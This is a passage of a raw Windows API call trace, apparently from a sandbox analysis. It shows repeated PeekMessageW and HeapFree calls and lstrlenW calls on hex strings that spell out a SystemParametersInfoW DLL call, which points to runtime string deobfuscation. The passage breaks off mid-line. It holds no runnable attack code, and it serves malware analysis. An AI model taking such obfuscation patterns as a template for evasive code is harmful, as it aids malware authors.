wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.608] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.609] lstrlenW (lpString="32") returned 2 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.609] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.609] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0225.609] lstrlenW (lpString="2E") returned 2 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0225.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.610] lstrlenW (lpString="64") returned 2 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] lstrlenW (lpString="6C") returned 2 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] lstrlenW (lpString="6C") returned 2 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.610] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] lstrlenW (lpString="62") returned 2 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] lstrlenW (lpString="6F") returned 2 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] lstrlenW (lpString="6F") returned 2 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] lstrlenW (lpString="6C") returned 2 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] lstrlenW (lpString="53") returned 2 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] lstrlenW (lpString="79") returned 2 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.611] lstrlenW (lpString="73") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="74") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="65") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="6D") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="50") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="61") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="72") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="61") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="6D") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.612] lstrlenW (lpString="65") returned 2 [0225.612] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.657] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="74") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="65") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="72") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="73") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="49") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="6E") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="66") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] lstrlenW (lpString="6F") returned 2 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.658] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] lstrlenW (lpString="57") returned 2 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] lstrlenW (lpString="75") returned 2 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] lstrlenW (lpString="69") returned 2 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.659] lstrlenW (lpString="6E") returned 2 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] lstrlenW (lpString="74") returned 2 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] lstrlenW (lpString="75") returned 2 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] lstrlenW (lpString="69") returned 2 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] lstrlenW (lpString="6E") returned 2 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] lstrlenW (lpString="74") returned 2 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.660] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] lstrlenW (lpString="70") returned 2 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] lstrlenW (lpString="74") returned 2 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] lstrlenW (lpString="72") returned 2 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.661] lstrlenW (lpString="75") returned 2 [0225.661] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, 